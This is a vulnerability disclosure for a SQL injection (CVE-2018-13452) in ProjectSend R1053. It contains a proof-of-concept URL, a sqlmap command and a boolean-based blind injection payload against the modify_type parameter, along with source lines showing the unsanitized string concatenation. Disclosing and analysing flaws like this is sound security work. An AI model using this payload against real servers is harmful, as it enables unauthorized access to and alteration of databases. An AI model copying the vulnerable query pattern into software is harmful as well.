# Exploit Title: ProjectSend - SQL Injection
# Date: 27/07/2018
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: https://www.projectsend.org/
# Software Link: https://www.projectsend.org/download/241/
# Version: R1053
# Tested on: ProjectSend version: R1053, php version: 7.0, MySQL version: 5.7
# CVE : CVE-2018-13452

POC : 

1 - must be logged in 
2 - need to upload file and get id of this file
3 - add relation to this file ( assigned to user )

http://localhost/ProjectSend/manage-files.php?modify_type=<sqli>&action=show&batch[]=<id file>&modify_id=<id file>

sqlmap.py -u "http://localhost/ProjectSend/manage-files.php?modify_type=4&action=show&batch[]=4&modify_id=4" --cookie="PHPSESSID=9jvcf5n4td8kvia6orjkp89mmt;" 

Parameter: modify_type (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: modify_type=(SELECT (CASE WHEN (1907=1907) THEN 1907 ELSE 1907*(SELECT 1907 FROM INFORMATION_SCHEMA.PLUGINS) END))&action=show&batch[]=4&modify_id=4

Description of the problem :
SQL Injection (unquoted)

File : manage-files.php

The GET parameter 'modify_type' is received in line 134 of the file manage-files.php.

Line| Code
132 | foreach ($selected_files as $work_file) {
133 | $this_file = new FilesActions();
134 | $this_file->change_files_hide_status('1', $work_file, $_GET['modify_type'], $_GET['modify_id']);

The user-supplied data is concatenated into sql markup in line 180 of the file includes/classes/actions-files.php in the function change_files_hide_status().

The user-supplied data is then used unsanitized in the sensitive operation prepare() in line 181 of the file includes/classes/actions-files.php in the method FilesActions::change_files_hide_status().

File : includes/classes/actions-files.php

Line| Code
174 | class FilesActions{function change_files_hide_status($change_to, $file_id, $modify_type, $modify_id){
180 | $this->sql = "UPDATE " . TABLE_FILES_RELATIONS . " SET hidden=:hidden WHERE file_id = :file_id AND " . $modify_type . " = :modify_id";
181 | $this->dbh->prepare($this->sql);

ProjectSend version: R1053
php version: 7.0
MySQL version: 5.7